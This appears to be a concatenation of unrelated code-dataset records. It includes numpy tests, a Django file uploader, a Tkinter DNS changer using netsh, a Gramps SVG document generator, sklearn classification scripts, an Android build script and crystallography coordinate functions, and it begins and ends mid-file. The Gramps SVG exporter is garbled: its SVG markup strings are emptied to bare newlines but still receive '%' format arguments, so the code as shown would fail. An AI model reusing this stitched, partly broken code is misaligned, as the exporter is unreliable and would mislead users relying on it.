excerpts(10,\n n_excerpts=3,\n excerpt_size=10)]\n assert bounds == [(0, 10)]\n\n\ndef test_get_excerpts():\n data = np.random.rand(100, 2)\n subdata = get_excerpts(data, n_excerpts=10, excerpt_size=5)\n assert subdata.shape == (50, 2)\n ae(subdata[:5, :], data[:5, :])\n ae(subdata[-5:, :], data[-10:-5, :])\n\n data = np.random.rand(10, 2)\n subdata = get_excerpts(data, n_excerpts=10, excerpt_size=5)\n ae(subdata, data)\n\n\n#------------------------------------------------------------------------------\n# Test PartialArray\n#------------------------------------------------------------------------------\n\ndef test_partial_shape():\n\n _partial_shape(None, ())\n _partial_shape((), None)\n _partial_shape((), ())\n _partial_shape(None, None)\n\n assert _partial_shape((5, 3), 1) == (5,)\n assert _partial_shape((5, 3), (1,)) == (5,)\n assert _partial_shape((5, 10, 2), 1) == (5, 10)\n with raises(ValueError):\n _partial_shape((5, 10, 2), (1, 2))\n assert _partial_shape((5, 10, 3), (1, 2)) == (5,)\n assert _partial_shape((5, 10, 3), (slice(None, None, None), 2)) == (5, 10)\n assert _partial_shape((5, 10, 3), (slice(1, None, None), 2)) == (5, 9)\n assert _partial_shape((5, 10, 3), (slice(1, 5, None), 2)) == (5, 4)\n assert _partial_shape((5, 10, 3), (slice(4, None, 3), 2)) == (5, 2)\n\n\ndef test_partial_array():\n # 2D array.\n arr = np.random.rand(5, 2)\n\n ae(PartialArray(arr)[:], arr)\n\n pa = PartialArray(arr, 1)\n assert pa.shape == (5,)\n ae(pa[0], arr[0, 1])\n ae(pa[0:2], arr[0:2, 1])\n ae(pa[[1, 2]], arr[[1, 2], 1])\n with raises(ValueError):\n pa[[1, 2], 0]\n\n # 3D array.\n arr = np.random.rand(5, 3, 2)\n\n pa = PartialArray(arr, (2, 1))\n assert pa.shape == (5,)\n ae(pa[0], arr[0, 2, 1])\n ae(pa[0:2], arr[0:2, 2, 1])\n ae(pa[[1, 2]], arr[[1, 2], 2, 1])\n with raises(ValueError):\n pa[[1, 2], 0]\n\n pa = PartialArray(arr, (1,))\n assert pa.shape == (5, 3)\n ae(pa[0, 2], arr[0, 2, 1])\n ae(pa[0:2, 1], arr[0:2, 1, 1])\n ae(pa[[1, 2], 0], arr[[1, 2], 0, 1])\n with raises(ValueError):\n pa[[1, 2]]\n\n # Slice and 3D.\n arr = np.random.rand(5, 10, 2)\n\n pa = PartialArray(arr, (slice(1, None, 3), 1))\n assert pa.shape == (5, 3)\n ae(pa[0], arr[0, 1::3, 1])\n ae(pa[0:2], arr[0:2, 1::3, 1])\n ae(pa[[1, 2]], arr[[1, 2], 1::3, 1])\n","sub_path":"phy/utils/tests/test_array.py","file_name":"test_array.py","file_ext":"py","file_size_in_byte":9927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"194648516","text":"# Basic file uploader app\nimport os\nfrom urllib import urlencode\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.core.cache import cache\nfrom django.utils import simplejson\nfrom forms.superuploader import SuperUploaderForm\nfrom handlers.upload import handle_file_upload\n\n\ndef superuploader(request):\n '''\n Handle file upload case\n '''\n if request.method == 'POST':\n form = SuperUploaderForm(request.POST, request.FILES) \n if form.is_valid():\n filename, filesize = handle_file_upload(request.FILES['file'])\n qargs = urlencode({ 'title': request.POST['title'], \n 'filename': filename,\n 'filesize': filesize,\n })\n redirect_url = ('/done/?{qargs}').format(qargs=qargs)\n return HttpResponseRedirect(redirect_url)\n else:\n form = SuperUploaderForm()\n\n return render_to_response('superuploader.tmpl', {'form': form,})\n\n\ndef done(request):\n filename = request.GET.get('filename')\n filesize = request.GET.get('filesize')\n return 
render_to_response('done.tmpl', {\n 'title': request.GET.get('title'),\n 'filename': filename, \n 'filesize': filesize, \n })\n\n\n\n","sub_path":"uploader/basic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"294490990","text":"#!/usr/bin/env python\n\nfrom gevent import monkey; monkey.patch_all()\n\nfrom pylib.wiring import gevent_zmq as zmq\nimport logging\n\nfrom lib import fetcherloop\nfrom pylib import conf, wiring\n\nlog = logging.getLogger(__name__)\n\ndef _parse_args():\n options, app_config = conf.parse_config()\n return app_config\n\ndef main():\n zmq_context = zmq.Context()\n \n config = _parse_args()\n \n opsecfetcher_out = wiring.Wire(\"collector_out\", zmq_context=zmq_context,\n conf_path=config.get('wiring_conf_path') or None)\n\n log.info('opsec fetcher starting..')\n fetcherloop.start(config, opsecfetcher_out)\n\nmain()\n","sub_path":"col/apps/opsec_fetcher/opsec_fetcher_old.py","file_name":"opsec_fetcher_old.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"139816818","text":"from Tkinter import *\nfrom subprocess import *\nimport ttk\n\nclass DNSChanger:\n\tdef __init__(self, root):\n\t\tself.configureGUI(root)\n\t\tself.clean()\n\t\tself.getNetworkInterfaces()\n\n\tdef log(self, error):\n\t\tself._log.insert(END, error)\n\n\tdef clean(self):\n\t\tself._progress[\"value\"] = 0\n\t\tself._log.delete(0.0, END)\n\t\troot.update()\n\n\tdef configureGUI(self, root):\n\t\troot.title('DNS Changer')\n\t\troot.resizable(0,0)\n\t\troot.geometry(\"500x600\")\n\n\t\tLabel(root, text=\"Network interfaces:\").pack()\n\n\t\tself._listbox = Listbox(root, width=30, height=10)\n\t\tself._listbox.pack()\n\n\t\tself._entry1 = Entry(root, width=30)\n\t\tself._entry1.insert(0, '8.8.8.8')\n\t\tself._entry1.pack()\n\n\t\tself._button1 = Button(root, text=\"Change DNS\", command=self.changeDNSCallback1)\n\t\tself._button1.pack()\n\n\t\tself._entry2 = Entry(root, width=30)\n\t\tself._entry2.pack()\n\t\tself._entry2.insert(0, '172.0.10.1')\n\n\t\tself._button2 = Button(root, text=\"Change DNS\", command=self.changeDNSCallback2)\n\t\tself._button2.pack()\n\n\t\tself._log = Text(root, width=120, height=25)\n\t\tself._log.pack()\n\n\t\tself._progress = ttk.Progressbar(root, orient =\"horizontal\",length = 500, mode =\"determinate\")\n\t\tself._progress.pack()\n\t\n\tdef getNetworkInterfaces(self):\n\t\tprocess = Popen('cmd', shell=True, stdin=PIPE, stdout=PIPE)\n\t\tout, err = process.communicate('ipconfig\\n')\n\t\tself._list = []\n\n\t\tfor line in out.split('\\n'):\n\t\t\tif line[0] != ' ' and ' adapter ' in line and 'Tunnel ' not in line:\n\t\t\t\titem = line[line.find('adapter') + len('adapter'):-2].strip() \n\t\t\t\tself._listbox.insert(END, item)\n\t\t\t\tself._list.append(item)\n\t\tself._listbox.config(state='disabled')\n\t\tself._progress[\"value\"] = 0\n\t\tself._progress[\"maximum\"] = len(self._list)\n\n\tdef changeNetworkInterfacesDNS(self, dns):\n\t\tself._button1.config(state='disabled')\n\t\tself._button2.config(state='disabled')\n\t\tself.clean()\n\t\tfor i, item in enumerate(self._list):\n\t\t\tcommand = \"netsh interface ip set dnsservers name=\\\"\" + item + \"\\\" static \" + dns + \"\\n\"\n\t\t\tprocess = Popen('cmd', shell=True, stdin=PIPE, stdout=PIPE)\n\t\t\t#out, err = process.communicate('netsh interface ip set dnsservers name=\\\"Bluetooth 
Network Connection\\\" static ' + dns + '\\n')\n\t\t\tout, err = process.communicate(command)\n\t\t\tself.log(out)\n\t\t\tself._progress[\"value\"] = i + 1\n\t\t\troot.update()\n\t\tself._button1.config(state='normal')\n\t\tself._button2.config(state='normal')\n\n\tdef changeDNSCallback1(self):\n\t\tdns = self._entry1.get()\n\t\tself.changeNetworkInterfacesDNS(dns)\n\n\tdef changeDNSCallback2(self):\n\t\tdns = self._entry2.get()\n\t\tself.changeNetworkInterfacesDNS(dns)\n\nif __name__ == \"__main__\":\n\troot= Tk();\n\n\tDNSChanger(root)\n\n\troot.mainloop()","sub_path":"10_DNSChanger/src/DNSChanger.pyw","file_name":"DNSChanger.pyw","file_ext":"pyw","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"462757858","text":"#\n# Gramps - a GTK+/GNOME based genealogy program\n#\n# Copyright (C) 2000-2006 Donald N. Allingham\n# Copyright (C) 2007-2009 Brian G. Matherly\n# Copyright (C) 2010 Jakim Friant\n# Copyright (C) 2013 Paul Franklin\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\"\"\"\nSVG document generator.\n\"\"\"\n\n#-------------------------------------------------------------------------\n#\n# python modules\n#\n#-------------------------------------------------------------------------\nimport sys\nif sys.version_info[0] < 3:\n from StringIO import StringIO\nelse:\n from io import StringIO\n\n#-------------------------------------------------------------------------\n#\n# Gramps modules\n#\n#-------------------------------------------------------------------------\nfrom gramps.gen.const import GRAMPS_LOCALE as glocale\n_ = glocale.translation.gettext\nfrom gramps.gen.plug.docgen import BaseDoc, DrawDoc, SOLID, FONT_SANS_SERIF\nfrom gramps.gen.errors import ReportError\nfrom gramps.gen.plug.menu import EnumeratedListOption\nfrom gramps.gen.plug.report import DocOptions\n\n#-------------------------------------------------------------------------\n#\n# SvgDrawDoc\n#\n#-------------------------------------------------------------------------\nclass SvgDrawDoc(BaseDoc, DrawDoc):\n\n def __init__(self, styles, type, options=None):\n BaseDoc.__init__(self, styles, type)\n self.f = None\n self.filename = None\n self.level = 0\n self.time = \"0000-00-00T00:00:00\"\n self.page = 0\n\n self._bg = 'none' # SVG background, in case options are ignored\n if options:\n menu = options.menu\n self._bg = menu.get_option_by_name('svg_background').get_value()\n if self._bg == 'transparent':\n self._bg = 'none'\n\n def open(self, filename):\n if filename[-4:] != \".svg\":\n self.root = filename\n else:\n self.root = filename[:-4]\n\n def close(self):\n pass\n\n def start_page(self):\n self.page += 1\n if self.page != 1:\n name = \"%s-%d.svg\" % (self.root, self.page)\n else:\n name = \"%s.svg\" % self.root\n\n try:\n self.f = open(name,\"w\")\n except IOError as 
msg:\n raise ReportError(_(\"Could not create %s\") % name, msg)\n except:\n raise ReportError(_(\"Could not create %s\") % name)\n \n self.t = StringIO()\n \n width = self.paper.get_size().get_width()\n height = self.paper.get_size().get_height()\n\n self.f.write(\n '\\n'\n '\\n'\n '\\n'\n '\\n'\n % (width, height, width, height, self._bg)\n )\n\n def rotate_text(self, style, text, x, y, angle, mark=None):\n \"\"\" @param mark: IndexMark to use for indexing (not supported) \"\"\"\n style_sheet = self.get_style_sheet()\n stype = style_sheet.get_draw_style(style)\n pname = stype.get_paragraph_style()\n p = style_sheet.get_paragraph_style(pname)\n font = p.get_font()\n size = font.get_size()\n\n width = height = 0\n for line in text:\n width = max(width, self.string_width(font, line))\n height += size\n\n centerx, centery = units(( x+self.paper.get_left_margin(),\n y+self.paper.get_top_margin() ))\n xpos = (centerx - (width/2.0)) \n ypos = (centery - (height/2.0)) \n\n self.t.write(\n '')\n \n for line in text:\n # Center this line relative to the rest of the text\n linex = xpos + (width - self.string_width(font, line) ) / 2\n self.t.write(\n '' % (linex, size) +\n line +\n ''\n )\n self.t.write('\\n')\n \n def end_page(self):\n # Print the text last for each page so that it is rendered on top of \n # other graphic elements.\n self.f.write(self.t.getvalue())\n self.t.close()\n self.f.write('\\n')\n self.f.close()\n \n def draw_line(self, style, x1, y1, x2, y2):\n x1 += self.paper.get_left_margin()\n x2 += self.paper.get_left_margin()\n y1 += self.paper.get_top_margin()\n y2 += self.paper.get_top_margin()\n\n style_sheet = self.get_style_sheet()\n s = style_sheet.get_draw_style(style)\n\n line_out = '\\n')\n\n def draw_box(self, style, text, x, y, w, h, mark=None):\n \"\"\" @param mark: IndexMark to use for indexing (not supported) \"\"\"\n x += self.paper.get_left_margin()\n y += self.paper.get_top_margin()\n\n style_sheet = self.get_style_sheet()\n box_style = style_sheet.get_draw_style(style)\n\n if box_style.get_shadow():\n self.f.write(\n '\\n'\n )\n\n line_out = '' +\n line +\n '\\n'\n )\n\n def draw_text(self, style, text, x, y, mark=None):\n \"\"\" @param mark: IndexMark to use for indexing (not supported) \"\"\"\n x += self.paper.get_left_margin()\n y += self.paper.get_top_margin()\n \n style_sheet = self.get_style_sheet()\n box_style = style_sheet.get_draw_style(style)\n para_name = box_style.get_paragraph_style()\n p = style_sheet.get_paragraph_style(para_name)\n \n font = p.get_font()\n font_size = font.get_size()\n fs = (font_size/28.35) * 1.2\n self.t.write(\n '' +\n text +\n '\\n'\n )\n\n def center_text(self, style, text, x, y, mark=None):\n \"\"\" @param mark: IndexMark to use for indexing (not supported) \"\"\"\n style_sheet = self.get_style_sheet()\n box_style = style_sheet.get_draw_style(style)\n para_name = box_style.get_paragraph_style()\n p = style_sheet.get_paragraph_style(para_name)\n font = p.get_font()\n width = self.string_width(font, text) / 72\n x -= width\n self.draw_text(style, text, x, y)\n\ndef units(val):\n return (val[0]*35.433, val[1]*35.433)\n\n#------------------------------------------------------------------------\n#\n# SvgDrawDocOptions class\n#\n#------------------------------------------------------------------------\nclass SvgDrawDocOptions(DocOptions):\n \"\"\"\n Defines options and provides handling interface.\n \"\"\"\n\n def __init__(self, name, dbase):\n DocOptions.__init__(self, name)\n \n def add_menu_options(self, menu):\n \"\"\"\n Add 
options to the document menu for the docgen.\n        \"\"\"\n        category_name = 'Document Options' # internal name: don't translate\n\n        background = EnumeratedListOption(_('SVG background color'),\n                                          'transparent')\n        background.set_items([('transparent', _('transparent background')),\n                              ('white', _('white')),\n                              ('black', _('black')),\n                              ('red', _('red')),\n                              ('green', _('green')),\n                              ('blue', _('blue')),\n                              ('cyan', _('cyan')),\n                              ('magenta', _('magenta')),\n                              ('yellow', _('yellow')) ])\n        background.set_help(_('The color, if any, of the SVG background'))\n        menu.add_option(category_name, 'svg_background', background)\n","sub_path":"plugins/docgen/svgdrawdoc.py","file_name":"svgdrawdoc.py","file_ext":"py","file_size_in_byte":13274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"395086011","text":"import socket\nimport time\nimport logging\nimport serial, time, struct\nfrom WiiProxy import MultiWii\nfrom time import sleep\n\nfrom .gamepad import Controller\n\nHEADERSIZE = 25\n# ==================================\nclass FlightControlServer:\n    # ==================================\n    def __init__(self, host='192.168.2.107', port=2234):\n\n        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.s.bind((host, port))\n        self.s.listen(3)\n\n        self.multiwii = Controller()\n\n    # ==================================\n    def start(self):\n\n        print(\"Starting flight controller\")\n        self.multiwii.start()\n\n\n        while True:\n            # now our endpoint knows about the OTHER endpoint.\n            clientsocket, address = self.s.accept()\n            print(f\"Connection from {address} has been established.\")\n\n            while True:\n                msg = self.multiwii.getState()\n                msg = f\"{len(msg):<{HEADERSIZE}}\"+msg\n                clientsocket.send(bytes(msg,\"utf-8\"))\n                time.sleep(0.1)\n","sub_path":"code/quadagent/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"62157553","text":"import pandas as pd\n\n#Do the data preprocessing\nbase = pd.read_csv('credit_data.csv')\n#Fix the negative age values\nbase.loc[base.age < 0, 'age'] = 40.92\n \n#Split into predictors and the class\nprevisores = base.iloc[:, 1:4].values\nclasse = base.iloc[:, 4].values\n\n#Correct the missing values\nfrom sklearn.preprocessing import Imputer\nimputer = Imputer(missing_values = 'NaN', strategy = 'mean', axis = 0)\nimputer = imputer.fit(previsores[:, 1:4])\nprevisores[:, 1:4] = imputer.transform(previsores[:, 1:4])\n\n#Feature scaling\nfrom sklearn.preprocessing import StandardScaler\nscaler = StandardScaler()\nprevisores = scaler.fit_transform(previsores)\n\n#Split the dataset into training and test sets\nfrom sklearn.model_selection import train_test_split\nprevisores_treinamento, previsores_teste, classe_treinamento, classe_teste = train_test_split(previsores, classe, test_size=0.25, random_state=0)\n\n\n#Set up the neural network\nfrom sklearn.neural_network import MLPClassifier\n#Train the neural network\nclassificador = MLPClassifier(verbose = True,\n                              max_iter=1000,\n                              tol = 0.0000010,\n                              solver = 'adam',\n                              hidden_layer_sizes=(100,),\n                              activation='relu')\nclassificador.fit(previsores_treinamento, classe_treinamento)\nprevisoes = classificador.predict(previsores_teste)\n\n#Show the result and the matrix of hits and misses\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nprecisao = accuracy_score(classe_teste, previsoes)\nmatriz = confusion_matrix(classe_teste, 
previsoes)","sub_path":"Classification/Artificial neural networks/redes_neurais_credit_data.py","file_name":"redes_neurais_credit_data.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"191129850","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nfrom sklearn.base import clone\nfrom sklearn.ensemble import RandomForestClassifier\nfrom keras.datasets import fashion_mnist\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.metrics import precision_score, recall_score, f1_score, accuracy_score, confusion_matrix, roc_auc_score\n\n\n# Load & preprocessing\n(train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.fashion_mnist.load_data()\nlabels = ['Dress','Trousers','Pull','Dress2','Coat','Heels','Sweater','Shoes','Other','Boot']\n\nim_shape = train_images.shape\ntrain_images = train_images.reshape(60000,im_shape[1]*im_shape[2])\ntest_images = test_images.reshape(10000,im_shape[1]*im_shape[2])\n\nscaler = StandardScaler()\ntrain_images = scaler.fit_transform(train_images.astype('float32'))\ntest_images = scaler.fit_transform(test_images.astype('float32'))\n\n# Data exploration\n# for i in range(10):\n# plt.imshow(train_images[i])\n# plt.title(labels[train_labels[i]])\n# plt.axis('off')\n# plt.show()\n\n# print('Train images shape:', train_images.shape)\n# print('Test images shape:', test_images.shape)\n# print('Train labels shape:', train_labels.shape)\n# print('Test label shape:', train_labels.shape)\n\nmodel_set = [\n SGDClassifier(max_iter=100),\n RandomForestClassifier()\n]\nmodel_index = 0\n\nskf = StratifiedKFold(n_splits=3, random_state=42, shuffle=True)\n\nfor model in model_set:\n matrix = []\n accuracy = []\n precision = []\n recall = []\n f1 = []\n roc = []\n \n for train_index, test_index in skf.split(train_images, train_labels): \n x_train_fold = train_images[train_index]\n y_train_fold = train_labels[train_index]\n x_test_fold = train_images[test_index]\n y_test_fold = train_labels[test_index]\n \n # clone_clf.fit(x_train_fold, y_train_fold) #whats the benefit of cloning ?\n \n model.fit(x_train_fold, y_train_fold)\n y_pred_fold = model.predict(x_test_fold)\n \n matrix.append(confusion_matrix(y_test_fold, y_pred_fold))\n accuracy.append(accuracy_score(y_test_fold, y_pred_fold))\n precision.append(precision_score(y_test_fold, y_pred_fold, average='weighted')) # what are the different average method and their effect on the score\n recall.append(recall_score(y_test_fold, y_pred_fold, average='weighted'))\n f1.append(f1_score(y_test_fold, y_pred_fold, average='weighted'))\n # roc.append(roc_auc_score(y_test_fold, y_pred_fold, average='weighted'))\n \n print(model_set[model_index])\n model_index+=1\n print('Accuracy:', round(np.average(accuracy), 2)*100, '%')\n print('Precision:', round(np.average(precision), 2)*100, '%')\n print('Recall:', round(np.average(recall), 2)*100, '%')\n # print('ROC score:', round(np.average(roc), 2)*100, '%')\n print('Matrix:', matrix[0]) #average the different matrix\n plt.matshow(matrix[0])\n plt.show()\n row_sum = matrix[0].sum(axis=1, keepdims=True)\n matrix_absolute = matrix[0]/row_sum\n plt.matshow(matrix_absolute)\n plt.show()\n\n# what are the different scoring classifiers vs non scoring classifier\n# what about the recision recall tradoff in multiclass problems 
? We cant move a treshold when the classes are mutually exclusive...","sub_path":"3. Classification/classification_mnist.py","file_name":"classification_mnist.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"578789305","text":"#!/usr/bin/env python\n#\n# Copyright 2019 The Nakama Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport sys\nimport subprocess\nimport os\n\nif len(sys.argv) < 2:\n print(\"Pass ABI parameter.\")\n print(\"e.g. armeabi-v7a, arm64-v8a or x86\")\n sys.exit(-1)\n\nABI = sys.argv[1]\nBUILD_MODE = 'Release'\n\ndef getEnvVar(name):\n if name in os.environ:\n return os.environ[name]\n return ''\n\nANDROID_NDK = getEnvVar('ANDROID_NDK')\nif not ANDROID_NDK:\n ANDROID_NDK = getEnvVar('NDK_ROOT')\n if not ANDROID_NDK:\n print(\"Error: no ANDROID_NDK or NDK_ROOT environment variable\")\n sys.exit(-1)\n\ndef call(command):\n res = subprocess.call(command, shell=False)\n if res != 0:\n sys.exit(-1)\n\nbuild_dir = os.path.abspath('build/' + ABI + '/' + BUILD_MODE)\n\ndef makedirs(dir):\n if not os.path.isdir(dir):\n os.makedirs(dir)\n\nprint('ANDROID_NDK=' + ANDROID_NDK)\n\nmakedirs(build_dir)\n\ncmake_args = [\n 'cmake',\n '-DANDROID_ABI=' + ABI,\n '-DCMAKE_TOOLCHAIN_FILE=' + ANDROID_NDK + '/build/cmake/android.toolchain.cmake',\n '-DCMAKE_BUILD_TYPE=' + BUILD_MODE,\n '-DANDROID_NATIVE_API_LEVEL=16',\n '-B',\n build_dir,\n '-GNinja',\n '../..'\n ]\n\n# generate projects\ncall(cmake_args)\n\n# build\ncall(['ninja', '-C', build_dir, 'nakama-cmake-client-example'])\n","sub_path":"examples/nakama-cmake-client-example/build/android/build_android.py","file_name":"build_android.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"450318932","text":"\nfrom extratos.models import *\n\n\n\nfrom django import template\n\nregister = template.Library()\n\ndef checkCC(value):\n\treturn value.filter(cod_imovel = None)\n\ndef soma(lancamentos,arg):\n\tsoma = 0\n\tlancamentos = lancamentos.filter(cod_imovel = arg)\n\tfor lancamento in lancamentos:\n\t\tif lancamento.credito:\n\t\t\tsoma+=lancamento.valor\n\t\telse:\n\t\t\tsoma-=lancamento.valor\n\treturn soma\n\ndef somatotal(lancamentos,arg):\n\tsoma = arg\n\tfor lancamento in lancamentos:\n\t\tif lancamento.credito:\n\t\t\tsoma+=lancamento.valor\n\t\telse:\n\t\t\tsoma-=lancamento.valor\n\treturn soma\n\ndef locatario_imovel(locatarios,imovel):\n\treturn locatarios.filter(imovel_id = imovel)\n\ndef lancamento_locatario(lancamentos,locatario):\n\treturn lancamentos.filter(locatario_id = locatario)\n\n\n\nregister.filter('checkCC', checkCC)\nregister.filter('soma', soma)\nregister.filter('somatotal', somatotal)\nregister.filter('locatario_imovel' 
,locatario_imovel)\nregister.filter('lancamento_locatario',lancamento_locatario)","sub_path":"relatorios/extratos/templatetags/extratos_extras.py","file_name":"extratos_extras.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"342335022","text":"import numpy as np\n\n\nclass MultinomialNaiveBayes():\n def __init__(self, classes, num_feat, smoothing_value=0):\n # Number of features the model uses\n self.num_feat = num_feat\n # List of the classes\n self.classes = classes\n # Dictionary mapping each class to the prior probability p(C=c)\n self.class_to_prior = {c: 0 for c in classes}\n # self.class_to_feature_to_cond_prob[c][x] is used to store the estimate of the conditional probability p(X=x|C=c)\n self.class_to_feature_to_cond_prob = {c: np.zeros((num_feat,)) for c in classes}\n # A smoothing value of 0 is equivalent to no smoothing\n self.smoothing_value = smoothing_value\n \n def fit(self, X, y):\n y = np.array(y)\n X = np.array(X)\n # Computer priors\n for c in y:\n self.class_to_prior[c] += 1\n self.class_to_prior.update({c: self.class_to_prior[c] / len(y) for c in self.classes})\n \n # Compute estimate of the conditional probability p(X=x|C=c)\n for c in self.classes:\n X_c = X[y == c]\n features_frequencies = np.sum(X_c, axis=0)\n self.class_to_feature_to_cond_prob[c] = (features_frequencies + self.smoothing_value) / sum(features_frequencies + self.smoothing_value)\n \n def predict(self, X):\n return np.argmax(np.stack([self.compute_scores(X, c) for c in self.classes], axis=-1), axis=1)\n \n def compute_scores(self, X, c):\n # If smoothing is not applied, some conditional probability will be zero and so we can't take the log of them\n if self.smoothing_value == 0:\n scores = []\n log_cond_prob = np.log(self.class_to_feature_to_cond_prob[c])\n for x in X:\n score = np.log(self.class_to_prior[c])\n for i, count in enumerate(x):\n if count != 0:\n score += log_cond_prob[i] * count\n scores.append(score)\n return scores\n \n adjusted_cond_prob = np.array([p if p != 0 else 10 ** -100 for p in self.class_to_feature_to_cond_prob[c]])\n return np.log(self.class_to_prior[c]) + np.matmul(X, np.log(adjusted_cond_prob))\n\n# def compute_score(self, x, c):\n# # Compute score (unnormalized log probability) for given class\n# return np.log(self.class_to_prior[c]) + np.dot(x, np.log(self.smooth(self.class_to_feature_to_cond_prob[c])))","sub_path":"multinomial_naive_bayes.py","file_name":"multinomial_naive_bayes.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"285092079","text":"import numpy as np\nfrom pymicro.crystal.lattice import Lattice, HklDirection, HklObject, HklPlane\nfrom pymicro.crystal.microstructure import Orientation\nfrom pymicro.xray.detectors import RegArrayDetector2d\nfrom pymicro.xray.laue import compute_Laue_pattern, compute_ellipsis, gnomonic_projection\nfrom matplotlib import pyplot as plt, cm\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\n\n# \n# name: homochoric_rep\n# @omega: rotation angle in [0,pi], n: rotation axis \n# @Xh,Yh,Zh: homochoric coordinates \n#\n \ndef homochoricRep(omega_deg,n):\n\t\n\tomega=omega_deg*np.pi/180.\n\ta=omega_deg/2.\n\tv_unit=n/np.linalg.norm(n)\n\tprint('unit vector',v_unit)\n\tt=np.cos(omega/2.)\n\tif(t>=0):\n\t\tf=((3./4.)*(omega-np.sin(omega)))**(1./3.)\n\t\t#print(f)\n\telif (t<0) and 
(np.abs(a-180.)>0.001):\n\t\tf=((3./4.)*(2*np.pi-omega+np.sin(omega)))**(1./3.)\n\t\t#print(f)\n\tXh=f*np.dot(v_unit,np.array([1.,0.,0.]))\n\tYh=f*np.dot(v_unit,np.array([0.,1.,0.]))\n\tZh=f*np.dot(v_unit,np.array([0.,0.,1.]))\n\tprint('Homochoric coordinate',Xh,Yh,Zh)\n\treturn Xh,Yh,Zh\n\n\n# \n# name: invHomochoricRep\n# @param: Xh,Yh,Zh: Homochoric coordinates\n# @return: omega,x,y,z\n# \ndef invHomochoricRep(Xh,Yh,Zh):\n\trho=np.sqrt(Xh**2.+Yh**2.+Zh**2.)\n\tt1=0.\n\tt_inv=0.\n\tf_inv=0.\n\ta_inv=0.\n\ta=[-0.500009615,-0.024866061,-0.004549382,0.000511867,-0.001650083,0.000759335,-0.000204042]\n#a: Series coefficients ( see numerically Modelling Simul. Mater. Sci. Eng 22(2014) )\n#page 10 \n\tfor i in range(1,8):\n\t\tt1=t1+(a[i-1]*(rho)**(2.*i))\n\tt_inv=t1+1.\n\tif (t_inv>=0.):\n\t\tomega=2.*np.arccos(t_inv)\n\t\ta_inv=(omega*180./np.pi)/2.\n\t\t#print('omega inv',omega*180/np.pi,a_inv)\n\tif (t_inv<0.):\n\t\tomega=2.*np.arccos(t_inv)\n\t\ta_inv=(omega*180./np.pi)/2.\n\t\t#print('omega inv',omega*180/np.pi,a_inv)\n\tif(t_inv>=0):\n\t\tf_inv=((3./4.)*(omega-np.sin(omega)))**(1./3.)\n\telif (t_inv<0.):\n\t\tf_inv=((3./4.)*(2*np.pi-omega+np.sin(omega)))**(1./3.)\n\tif (t_inv==1.) or (t_inv==-1.):\n\t\tf_inv=1.\n\t\n\tx_inv=Xh/f_inv\n\ty_inv=Yh/f_inv\n\tz_inv=Zh/f_inv\n\treturn a_inv*2.,x_inv,y_inv,z_inv\n\n\ndef cuboToHomochoric(xc,yc,zc):\n\t#step 1\n\tc=np.array([xc,yc,zc])\n\tc_prim=((np.pi/6.)**(1./6.))*c\n\tx=((np.pi/6.)**(1./6.))*xc\n\ty=((np.pi/6.)**(1./6.))*yc\n\tz=((np.pi/6.)**(1./6.))*zc\n\tfactx=0.\n\tfacty=0.\n\tY=0.\n\tX=0.\n\txh=0.\n\tyh=0.\n\tzh=0.\n\t#step 2 and 3\n\tif (y==0. and x==0. and z==0.):\n\t\txh=0.\n\t\tyh=0.\n\t\tzh=0.\n\telse:\n\t\t\n\t\tif (x==0. and y==0. and 